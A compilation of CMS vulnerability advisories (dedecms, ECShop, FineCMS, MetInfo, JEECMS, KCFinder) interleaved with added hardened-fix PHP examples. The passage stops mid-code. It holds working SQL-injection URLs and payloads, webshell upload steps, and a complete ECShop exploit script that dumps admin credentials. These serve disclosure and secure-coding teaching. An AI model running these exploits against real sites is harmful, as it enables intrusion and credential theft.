The following is a collection of ten vulnerability advisories, beginning with the dedecms 5.7 edit.inc.php injection vulnerability advisory, contributed to this site by "dzq8966799".
Code of the vulnerable file edit.inc.php:
if(!defined('DEDEINC')) exit('Request Error!');
if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];
else $GUEST_BOOK_POS = "guestbook.php";
$id = intval($id);
if(empty($job)) $job='view';
if($job=='del' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");
    ShowMsg("成功删除一条留言!", $GUEST_BOOK_POS);
    exit;
}
else if($job=='check' && $g_isadmin)
{
    $dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");
    ShowMsg("成功审核一条留言!", $GUEST_BOOK_POS);
    exit();
}
else if($job=='editok')
{
    $remsg = trim($remsg);
    if($remsg!='')
    {
        // admin replies are not HTML-filtered
        if($g_isadmin)
        {
            $msg = "".$msg."\n".$remsg;
            //$remsg admin reply:
        }
        else
        {
            $row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");
            $oldmsg = "".addslashes($row['msg'])."\n";
            $remsg = trimMsg(cn_substrR($remsg, 1024), 1);
            $msg = $oldmsg.$remsg;
        }
    }
    // $msg is not filtered here, so arbitrary injection is possible
    $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
    ShowMsg("成功更改或回复一条留言!", $GUEST_BOOK_POS);
    exit();
}
if($g_isadmin)
{
    $row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");
    require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');
}
else
{
    $row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");
    require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');
}
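The editok branch above splices $msg straight into the UPDATE statement. The following is an added example, not dedecms code: the same update written with bound parameters, run against an in-memory SQLite database through PDO so it executes stand-alone (the table name guestbook stands in for dedecms's `#@__guestbook` prefix placeholder, and the 1024-character trimming that cn_substrR performs is left outside the function).

```php
<?php
// Added example (not dedecms code): the "editok" update of edit.inc.php with $msg and
// $id bound as parameters instead of being concatenated into the SQL text.

function open_guestbook_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE guestbook (id INTEGER PRIMARY KEY, msg TEXT, email TEXT, posttime INTEGER)');
    // constructed sample row
    $pdo->exec("INSERT INTO guestbook (id, msg, email, posttime) VALUES (1, 'original message', 'a@example.invalid', 0)");
    return $pdo;
}

// Hardened replacement for:
//   UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='...' WHERE id='$id'
function update_guestbook_message(PDO $pdo, $id, string $msg): bool {
    $id = intval($id);   // edit.inc.php already casts $id; keep that
    $stmt = $pdo->prepare('UPDATE guestbook SET msg = :msg, posttime = :now WHERE id = :id');
    $stmt->execute([':msg' => $msg, ':now' => time(), ':id' => $id]);
    return $stmt->rowCount() === 1;
}

function read_guestbook_row(PDO $pdo, int $id): ?array {
    $stmt = $pdo->prepare('SELECT msg, email FROM guestbook WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = open_guestbook_db();
// The payload from the advisory, which in the original code rewrites the SET clause.
$payload = "',msg=user(),email='";
update_guestbook_message($pdo, 1, $payload);
$row = read_guestbook_row($pdo, 1);

// With bound parameters the quote and comma are just characters in the stored text:
// msg holds the payload verbatim and the email column is untouched.
assert($row['msg'] === $payload);
assert($row['email'] === 'a@example.invalid');
echo "msg stored literally: ", $row['msg'], PHP_EOL;
```

Binding parameters removes the dependency on magic_quotes_gpc entirely, which is why condition 1 below stops mattering; the intval() on $id stays because the id is still used as an integer.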
Conditions for successful exploitation:
1. PHP magic_quotes_gpc = off
2. The vulnerable file plus/guestbook.php must exist, and so must the dede_guestbook table.
How to check whether the vulnerability exists:
First open www.xxx.com/plus/guestbook.php, where other people's messages are visible,
then hover over [回复/编辑] (reply/edit) to see the ID of a message, and note it down.
Visit: www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=90sec'&id=<existing message ID>
After submitting, a dede 5.7 site shows "成功更改或回复一条留言" (message successfully changed or replied to), which means the update went through.
Go back to www.xxx.com/plus/guestbook.php and check whether the message with that ID now reads 90sec'. If it does, the vulnerability cannot be exploited, because the site has magic_quotes_gpc turned on.
If the message was not changed, i.e. its content is still the old one, the vulnerability can be exploited.
Then visit www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=<existing message ID>&msg=',msg=user(),email='
Go back, and the content of that message has been replaced with the MySQL user().
That is roughly how it is exploited; those interested can dig further!!
Finally, some will ask how to dump the admin account and password of the backend; work it out yourself and you will see. It can definitely be dumped (I would not have posted this otherwise)!!
As you can see, no filtering is done.
------------------------------------
The exploitation method is as follows:
1. demo.easethink.com/sms.php?act=subscribe: first obtain the verification code,
and put it into the verify parameter of the next step.
2. demo.easethink.com/sms.php?act=do_subscribe&verify=<verification code obtained in step 1>&mobile=111'and(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23
OK, no screenshot, no proof: the test screenshot follows. (Image not preserved.)
-----------------------------------------------------------------------
JEECMS latest vulnerability (file upload) advisory
Vulnerability description: this one is simple, the upload is not filtered. Register an account and upload an avatar; even a .jsp works. A dialog pops up saying the upload type is wrong; ignore it, close the dialog, right-click and view the page source: your file has already been uploaded.
The uploaded file has the form:
www.xxx.com/online/upload/M000000070500007/1349769169860.jsp?o=vLogin
Finecms 1.7.2 injection vulnerability advisory
Vulnerable files: Client.Class.php at line 29 (get_user_ip) and RegsiterController.php at line 145 (reg). The vulnerable code, the exploit and the analysis are identical to those in the FineCMS section below, which also includes a suggested fix.
ECShop 2.5.x & 2.6.x goods_script.php: $sql is not initialised, leading to an injection vulnerability
Affects 2.5.x and 2.6.x; other versions were not tested.
goods_script.php, line 44:
if (empty($_GET['type'])) {
    ...
} elseif ($_GET['type'] == 'collection') {
    ...
}
$sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
$res = $db->query($sql);
$sql is never initialised, an obvious vulnerability :)
EXP:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: cnhackerx at 163 dot com
team: hi.baidu.com/5427518
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
 * works with register_globals = On
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example: php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$resp = send();
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
if ($hash) exit("Exploit Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else exit("Exploit Failed!\n");
function send() {
    global $host, $path;
    $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
    $data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $cmd;
    $fp = fsockopen($host, 80);
    fputs($fp, $data);
    $resp = '';
    while ($fp && !feof($fp)) $resp .= fread($fp, 1024);
    return $resp;
}
?>
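With register_globals on, an uninitialised $sql simply becomes whatever the request supplies. Initialising it is the minimum fix; the added example below (not ECShop code) goes one step further and derives the statement only from a fixed map keyed by the allowed `type` values, so nothing from the request is ever concatenated into SQL. The column and table names in the map are assumed for illustration, not taken from ECShop.

```php
<?php
// Added example, not ECShop code. goods_script.php lets the request decide $sql because
// the variable is never initialised and register_globals can supply it. Here the statement
// can only come from this allowlist; an unknown `type` is refused rather than executed.

const GOODS_SCRIPT_QUERIES = [
    // type => query with one placeholder for the limit (names assumed for the example)
    'collection' => 'SELECT goods_id, goods_name FROM ecs_goods WHERE is_on_sale = 1 ORDER BY add_time DESC LIMIT ?',
    'best'       => 'SELECT goods_id, goods_name FROM ecs_goods WHERE is_best = 1 LIMIT ?',
];

// Returns [sql, params] for a known type, or null when the request must be rejected.
function goods_script_query(array $get): ?array {
    $type = isset($get['type']) ? (string)$get['type'] : '';
    if (!array_key_exists($type, GOODS_SCRIPT_QUERIES)) {
        return null;                          // unknown type: refuse instead of running whatever $sql holds
    }
    $num = isset($get['goods_num']) ? intval($get['goods_num']) : 10;
    if ($num < 1 || $num > 100) {
        $num = 10;                            // clamp the limit so it cannot be abused either
    }
    return [GOODS_SCRIPT_QUERIES[$type], [$num]];
}

// Constructed requests: the advisory's shape (an unexpected `type` plus a `sql` body)
// and a legitimate one.
assert(goods_script_query(['type' => '1342000000', 'sql' => 'SELECT ...']) === null);
assert(goods_script_query(['type' => 'collection', 'goods_num' => '5'])[1] === [5]);
assert(goods_script_query(['type' => 'best', 'goods_num' => '-3'])[1] === [10]);
echo "queries resolved only from the allowlist", PHP_EOL;
```

The returned [sql, params] pair is meant to be passed to a prepared statement; the LIMIT value is bound, not interpolated, even though intval() already makes it safe.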
Release date: -07.19
Author: Ryat. Affected versions: ECShop 2.5.x & 2.6.x
Official site: www.ecshop.com
FineCMS is a content management system built on PHP + MySQL. It follows the MVC design pattern, separating business logic from the presentation layer so that web designers can easily build the templates they want.
Vulnerable file:
Client.Class.php, at line 29:
public static function get_user_ip() {
    if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
        $onlineip = getenv('HTTP_CLIENT_IP');
    } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
        $onlineip = getenv('HTTP_X_FORWARDED_FOR');
    } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
        $onlineip = getenv('REMOTE_ADDR');
    } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
        $onlineip = $_SERVER['REMOTE_ADDR'];
    }
    return $onlineip;
}
/* Obviously a forged client_ip can be used for injection */
RegsiterController.php, at line 145:
private function reg($data) {
    if (empty($data)) return false;
    $data['groupid'] = 1;
    $data['regdate'] = time();
    $data['regip'] = client::get_user_ip(); // uses the vulnerable get_user_ip method; this is where the flaw arises
    $data['status'] = $this->memberconfig['status'] ? 0 : 1;
    $data['modelid'] = (!isset($data['modelid']) || empty($data['modelid'])) ? $this->memberconfig['modelid'] : $data['modelid'];
    if (!isset($this->membermodel[$data['modelid']])) $this->memberMsg('会员模型不存在,请联系管理员。');
    if ($this->memberconfig['uc_use'] == 1) {
        if (uc_get_user($data['username'])) {
            $this->memberMsg('该用户无需注册,请直接登录激活!', url('member/login'), 1);
        }
        $uid = uc_user_register($data['username'], $data['password'], $data['email']);
        if ($uid <= 0) {
            if ($uid == -1) {
                $this->memberMsg('用户名不合法');
            } elseif($uid == -2) {
                $this->memberMsg('包含要允许注册的词语');
            } elseif($uid == -3) {
                $this->memberMsg('用户名已经存在');
            } elseif($uid == -4) {
                $this->memberMsg('Email 格式有误');
            } elseif($uid == -5) {
                $this->memberMsg('Email 不允许注册');
            } elseif($uid == -6) {
                $this->memberMsg('该 Email 已经被注册');
            } else {
                $this->memberMsg('未定义');
            }
        } else {
            $username = $data['username'];
        }
    }
    $data['password'] = md5($data['password']);
    $userid = $this->member->insert($data); // variable name lost in extraction; $userid assumed
    return $userid;
}
Exploitation:
EXP: when submitting the user registration, forge a client_ip with the following content:
sb','1','6'),('hell','1b192f49ddec03d0c7e777d3e578cebf',(select username from fn_user where userid=1),'1','11111','sbd','1','6')#
Once this succeeds, log in as user hell with password sbdan; the admin's username appears in the email field.
Suggested fix:
function get_user_ip(){
    if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
        $onlineip = getenv('HTTP_CLIENT_IP');
    } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
        $onlineip = getenv('HTTP_X_FORWARDED_FOR');
    } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
        $onlineip = getenv('REMOTE_ADDR');
    } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
        $onlineip = $_SERVER['REMOTE_ADDR'];
    }
    preg_match("/[\d\.]{7,15}/", $onlineip, $onlineipmatches);
    $onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
    return $onlineip;
}
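The suggested fix keeps only a run of digits and dots, which stops the quote from reaching the SQL but still accepts non-addresses such as 999.1 and still believes X-Forwarded-For from anyone. The added example below (not FineCMS code) validates the value with FILTER_VALIDATE_IP and honours the proxy header only when REMOTE_ADDR belongs to a trusted reverse proxy; $trusted_proxies is an assumed deployment setting, and the request environments are constructed for the test.

```php
<?php
// Added example, not FineCMS code: a client-IP lookup that never returns anything but a
// syntactically valid address, and only trusts forwarding headers behind a known proxy.

function client_ip(array $server, array $trusted_proxies = []): string {
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return 'unknown';
    }
    if (!in_array($remote, $trusted_proxies, true)) {
        // Direct client: HTTP_CLIENT_IP / X-Forwarded-For are attacker-controlled, ignore them.
        return $remote;
    }
    // Behind a trusted proxy: use the last hop of X-Forwarded-For (the one our proxy appended).
    $xff  = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    $hops = array_map('trim', explode(',', $xff));
    $candidate = end($hops);
    if ($candidate !== false && filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
        return $candidate;
    }
    return $remote;   // header missing or malformed: fall back to the proxy address
}

// Constructed request environments.
$inject = [
    'REMOTE_ADDR'    => '203.0.113.5',
    'HTTP_CLIENT_IP' => "sb','1','6'),('hell',...)#",   // advisory-style payload in the header
];
assert(client_ip($inject) === '203.0.113.5');

$spoof = ['REMOTE_ADDR' => '203.0.113.5', 'HTTP_X_FORWARDED_FOR' => '10.0.0.1'];
assert(client_ip($spoof) === '203.0.113.5');              // not a trusted proxy: header ignored

$proxied = ['REMOTE_ADDR' => '192.0.2.10', 'HTTP_X_FORWARDED_FOR' => "junk', 198.51.100.7"];
assert(client_ip($proxied, ['192.0.2.10']) === '198.51.100.7');

$badhop = ['REMOTE_ADDR' => '192.0.2.10', 'HTTP_X_FORWARDED_FOR' => "' or 1=1"];
assert(client_ip($badhop, ['192.0.2.10']) === '192.0.2.10');
echo "all client_ip checks passed", PHP_EOL;
```

Even with a validated address, regip should still be written through a prepared statement; input validation narrows what reaches the query, parameter binding is what keeps it data.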
I saw this on Weibo and took a look. The vulnerability can be exploited in more than one place, and it actually works even when magic_quotes_gpc = On. Genuinely not useless.
Author: c4rp3nt3r@0x50sec.org
The latest Dedecms has a variable overwrite vulnerability in plus/search.php; successful exploitation yields the admin password.
黑哥 says the vulnerability has already been patched. My fault for not testing properly, and I did not use it against any site... but it is a genuinely nice bug and should still have some value. I will leave the title as it is; since it is patched, it can be made public.
============
require_once(dirname(__FILE__)."/../include/common.inc.php");
require_once(DEDEINC."/arc.searchview.class.php");
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
if(!isset($orderby)) $orderby='';
else $orderby = preg_replace("#[^a-z]#i", '', $orderby);
if(!isset($searchtype)) $searchtype = 'titlekeyword';
else $searchtype = preg_replace("#[^a-z]#i", '', $searchtype);
if(!isset($keyword)){
    if(!isset($q)) $q = '';
    $keyword=$q;
}
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
// look up the category information
if(empty($typeid))
{
    $typenameCacheFile = DEDEDATA.'/cache/typename.inc';
    if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
    {
        $fp = fopen(DEDEDATA.'/cache/typename.inc', 'w');
        fwrite($fp, "<"."?php\r\n");
        $dsql->SetQuery("Select id,typename,channeltype From `#@__arctype`");
        $dsql->Execute();
        while($row = $dsql->GetArray())
        {
            fwrite($fp, "\$typeArr[{$row['id']}] = '{$row['typename']}';\r\n");
        }
        fwrite($fp, '?'.'>');
        fclose($fp);
    }
    // include the category cache and check whether the keyword contains a category name
    require_once($typenameCacheFile);
    // the $typeArr array is defined in the generated cache file included above; because of
    // dedecms's global-variable mechanism (request parameters become globals) we can define it ourselves
    if(isset($typeArr) && is_array($typeArr))
    {
        foreach($typeArr as $id=>$typename)
        {
            $keywordn = str_replace($typename, ' ', $keyword); // this is the step that has to be passed
            if($keyword != $keywordn)
            {
                $keyword = $keywordn;
                $typeid = $id; // variable overwrite: this turns the earlier check
                               // $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; into a no-op
                break;
            }
        }
    }
}
Further down, plus/search.php creates a Search object.
In arc.searchview.class.php, the SearchView class constructor instantiates a TypeLink:
$this->TypeLink = new TypeLink($typeid);
The TypeLink constructor does no filtering (the programmer assumed the value had already been filtered...) and puts it straight into the SQL statement.
class TypeLink
{
    var $typeDir;
    var $dsql;
    var $TypeID;
    var $baseDir;
    var $modDir;
    var $indexUrl;
    var $indexName;
    var $TypeInfos;
    var $SplitSymbol;
    var $valuePosition;
    var $valuePositionName;
    var $OptionArrayList;
    // constructor ///////
    // PHP5 constructor
    function __construct($typeid)
    {
        $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
        $this->indexName = $GLOBALS['cfg_indexname'];
        $this->baseDir = $GLOBALS['cfg_basedir'];
        $this->modDir = $GLOBALS['cfg_templets_dir'];
        $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
        $this->dsql = $GLOBALS['dsql'];
        $this->TypeID = $typeid;
        $this->valuePosition = '';
        $this->valuePositionName = '';
        $this->typeDir = '';
        $this->OptionArrayList = '';
        // load the category information
        $query = "SELECT tp.*,ch.typename as
        ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
        `#@__channeltype` ch
        on ch.id=tp.channeltype WHERE tp.id='$typeid' "; // the injection happens here; obviously it needs magic_quotes_gpc = Off. Useless? Not really: at least no member-centre account is needed
        if($typeid >0)
        {
            $this->TypeInfos = $this->dsql->GetOne($query);
Exploit code one (requires magic_quotes_gpc = Off):
www.myhack58.com /plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
This is just one of the exploit paths... Further down in the Search class constructor:
...... omitted
$this->TypeID = $typeid;
...... omitted
if($this->TypeID=="0"){
    $this->ChannelTypeid=1;
}else{
    $row =$this->dsql->GetOne("SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}"); // this injection works regardless of magic_quotes_gpc = On, dear
    // not so useless now, is it dear...
    $this->ChannelTypeid=$row['channeltype'];
}
Exploit code two; the EXP below works even with magic_quotes_gpc = On:
www.myhack58.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
If that table in the database already has content, things get a bit more complicated. I did not think it all through: I analysed it, ran a quick test, and did not use it against any site.
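The root cause above is that is_numeric($typeid) is checked once, early, and the typename loop then lets a key of the request-supplied $typeArr replace $typeid before TypeLink uses it. The added example below (not dedecms code) reproduces the loop as a small function and pairs it with a TypeLink stand-in that re-validates at the sink: it accepts only a non-negative integer and binds it in a prepared statement over an in-memory SQLite table. The class name SafeTypeLink, the arctype table and the sample rows are constructed for the example; PHP 7.4 or newer is assumed for the typed properties.

```php
<?php
// Added example, not dedecms code. Demonstrates why validation must happen at the point of
// use: the search.php loop can replace a previously validated $typeid with an array key.

function resolve_type_id(string $keyword, array $typeArr, $typeid): array {
    // Mirrors the search.php loop: a category name found inside the keyword selects that id.
    foreach ($typeArr as $id => $typename) {
        $stripped = str_replace($typename, ' ', $keyword);
        if ($stripped !== $keyword) {
            return [$stripped, $id];      // <- the overwrite: $id is whatever key the array had
        }
    }
    return [$keyword, $typeid];
}

class SafeTypeLink {
    public int $typeId;
    public ?array $typeInfos = null;

    public function __construct(PDO $dsql, $typeid) {
        // The sink re-validates instead of trusting the caller's earlier is_numeric() check.
        if (!preg_match('/^\d+$/', (string)$typeid)) {
            throw new InvalidArgumentException('type id must be a non-negative integer');
        }
        $this->typeId = (int)$typeid;
        if ($this->typeId > 0) {
            $stmt = $dsql->prepare('SELECT id, typename FROM arctype WHERE id = :id');
            $stmt->execute([':id' => $this->typeId]);
            $row = $stmt->fetch(PDO::FETCH_ASSOC);
            $this->typeInfos = $row === false ? null : $row;
        }
    }
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE arctype (id INTEGER PRIMARY KEY, typename TEXT)');
$db->exec("INSERT INTO arctype VALUES (2, 'news')");   // constructed sample category

// Request-supplied typeArr of the kind the advisory describes: the array key carries SQL
// and the value is a substring of the keyword, so the loop picks it.
$evilTypeArr = ["2' and (select 1 from (select count(*),concat(...))b) and '" => 'c4'];
[$kw, $typeid] = resolve_type_id('c4rp3nt3r', $evilTypeArr, 0);
assert(is_string($typeid));                  // the "numeric" id is now an arbitrary string
try {
    new SafeTypeLink($db, $typeid);
    $rejected = false;
} catch (InvalidArgumentException $e) {
    $rejected = true;
}
assert($rejected === true);                  // the sink refuses it

// Legitimate flow with the real cached typename array:
[$kw, $typeid] = resolve_type_id('news today', [2 => 'news'], 0);
$link = new SafeTypeLink($db, $typeid);
assert($link->typeInfos['typename'] === 'news');
echo "overwritten id rejected, genuine id resolved", PHP_EOL;
```

Two things make this robust where the original is not: the check sits inside the class that runs the query, so no later assignment can sidestep it, and the id is bound rather than interpolated, so the second injection point (WHERE id={$this->TypeID}, which needs no quote at all) disappears as well. Blocking request parameters from becoming globals in the first place is the complementary fix, shown under the MetInfo section.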
MetInfo released the new version 5.1.5 on the 23rd, which patches the vulnerability described in this article; strictly speaking it should be called an arbitrary variable overwrite vulnerability....
ps: reposting in any form is welcome; first published on t00ls.net
Note: do not use the content of this article for any illegal activity; you bear the consequences yourself.
author:my5t3ry
Without further ado, the code:
include\common.inc.php, lines 20-39:
$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php');
@extract($db_settings);
require_once ROOTPATH.'include/mysql_class.php';
$db = new dbmysql;
$db->dbconn($con_db_host, $con_db_id, $con_db_pass, $con_db_name);
define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
isset($_REQUEST['GLOBALS']) && exit('Access Error');
require_once ROOTPATH.'include/global.func.php';
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
    foreach($$_request as $_key => $_value) {
        $_key{0} != '_' && $$_key = daddslashes($_value);
    }
}
$query = "select * from {$tablepre}config where name='met_tablename' and lang='metinfo'";
$mettable = $db->get_one($query);
$mettables = explode('|', $mettable[value]);
foreach($mettables as $key => $val) {
    $tablename = 'met_'.$val;
    $$tablename = $tablepre.$val;
}
MetInfo queries the {$tablepre}config table and initialises the table-name variables from the result in a foreach loop. The $tablepre used there is initialised by the code
$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php'); @extract($db_settings);
The system then queries the database with statements such as "SELECT * FROM $met_message where id=$id and lang='$lang'",
where $met_message is one of the variables set up by that foreach loop......
We can overwrite $tablepre so that the table-name initialisation fails, and then supply the table-name variable ourselves.....
I found a backend upload page; by overwriting variables I bypassed the backend authentication check and overwrote the list of allowed upload extensions, turning it into an upload vulnerability.
MetInfo v5.1.3 arbitrary file upload vulnerability advisory
exp: arbitrary file upload
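The overwrite works because the request loop in common.inc.php copies every _COOKIE/_POST/_GET key not starting with "_" into a global, after configuration and table-name variables already exist. The added example below (not MetInfo code) performs that import the safe way: it refuses any request key that already exists as a variable or that carries a reserved prefix, and returns the collisions so the request can be logged or dropped. $existing, the reserved prefixes and the sample request are constructed for the example.

```php
<?php
// Added example, not MetInfo code. A request-to-globals import that cannot clobber
// configuration: existing variables and reserved prefixes are blocked and reported.

function import_request_vars(array $existing, array $request,
                             array $reserved_prefixes = ['met_', 'con_db_']): array {
    $imported = [];
    $blocked  = [];
    foreach ($request as $key => $value) {
        $key = (string)$key;
        if ($key === '' || $key[0] === '_' || $key === 'GLOBALS') {
            $blocked[] = $key;                 // the original's own checks, kept
            continue;
        }
        $collides = array_key_exists($key, $existing);   // would overwrite something already defined
        foreach ($reserved_prefixes as $prefix) {
            if (strncmp($key, $prefix, strlen($prefix)) === 0) {
                $collides = true;              // table names and DB settings are never request-settable
            }
        }
        if ($collides) {
            $blocked[] = $key;
            continue;
        }
        $imported[$key] = $value;
    }
    return ['imported' => $imported, 'blocked' => $blocked];
}

// Constructed state: what common.inc.php has set up before the request loop runs.
$existing = [
    'tablepre'    => 'met_',
    'con_db_host' => 'localhost',
    'met_message' => 'met_message',
    'db'          => 'handle',
];
// Constructed request: one ordinary parameter plus the overwrite attempts the advisory describes.
$request = [
    'id'          => '7',
    'tablepre'    => 'x',
    'met_message' => 'evil',
    'GLOBALS'     => ['a' => 1],
    '_request'    => 'y',
];

$result = import_request_vars($existing, $request);
assert($result['imported'] === ['id' => '7']);
assert($result['blocked'] === ['tablepre', 'met_message', 'GLOBALS', '_request']);
echo "blocked: ", implode(', ', $result['blocked']), PHP_EOL;
```

A non-empty blocked list is itself a useful detection signal: a legitimate client has no reason to send parameters named tablepre or met_message, so such requests can be logged and rejected outright rather than silently ignored.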
Arbitrary file upload
Brief description:
Dangerous file types are allowed to be uploaded, and this system is used by quite a few sites.
Open the online-course site (see figure), log in, and upload a PHP file into the net disk; the net disk does not filter PHP files at all.
Then choose "use net-disk file", select the PHP file, and switch to the HTML view, where the server-side path of the PHP file is shown, e.g. xxx.xxx.cn/SCR/Course … 31/111026085064.php. When executed, a large PHP shell apparently does not work, but an ASP file uploaded the same way does.
This system's database user is sa, which is a bit...
The upload page of KCFinder 2.X does not filter strictly, leading to a file upload vulnerability.
1.Go to target link
localhost/KCFinder/browse.php
2.upload your shell as [shell.php.jpg]
Note: this only works together with the filename parsing vulnerability on Linux systems.
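The JEECMS, MetInfo, online-course and KCFinder items above are the same mistake seen four times: the server trusts the client-supplied name or a client-side type check. The added example below (not code from any of those projects) accepts a file only if its single extension is on an allowlist, which also rejects names like shell.php.jpg that a server configured to honour multiple extensions would execute, if the bytes match the claimed image type, and it returns a server-generated name so the client never chooses a path. The allowlist, the tiny 1x1 GIF and the renamed PHP file are constructed for the test.

```php
<?php
// Added example, not JEECMS/MetInfo/KCFinder code: server-side upload validation that
// checks the name, then the content, then discards the client's name entirely.

const ALLOWED_IMAGE = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                       'png' => 'image/png', 'gif' => 'image/gif'];

// Returns the lower-cased extension if the name is acceptable, null otherwise.
function check_upload_name(string $clientName): ?string {
    $base = basename($clientName);                      // drop any directory part
    // exactly one dot and an ASCII-safe stem: "shell.php.jpg" and "avatar.jsp" both fail here
    if (!preg_match('/^[A-Za-z0-9_-]+\.([A-Za-z0-9]+)$/', $base, $m)) {
        return null;
    }
    $ext = strtolower($m[1]);
    return array_key_exists($ext, ALLOWED_IMAGE) ? $ext : null;
}

// Returns the name to store the file under (outside the web root), or null to reject.
function accept_upload(string $clientName, string $tmpPath): ?string {
    $ext = check_upload_name($clientName);
    if ($ext === null) {
        return null;
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($tmpPath) !== ALLOWED_IMAGE[$ext]) {
        return null;                                    // content must match the extension
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;      // server-chosen name
}

// Name checks alone:
assert(check_upload_name('shell.php.jpg') === null);
assert(check_upload_name('avatar.jsp') === null);
assert(check_upload_name('../photo.PNG') === 'png');

// Content checks with a constructed 1x1 GIF and a PHP file renamed to .gif:
$gif = tempnam(sys_get_temp_dir(), 'up');
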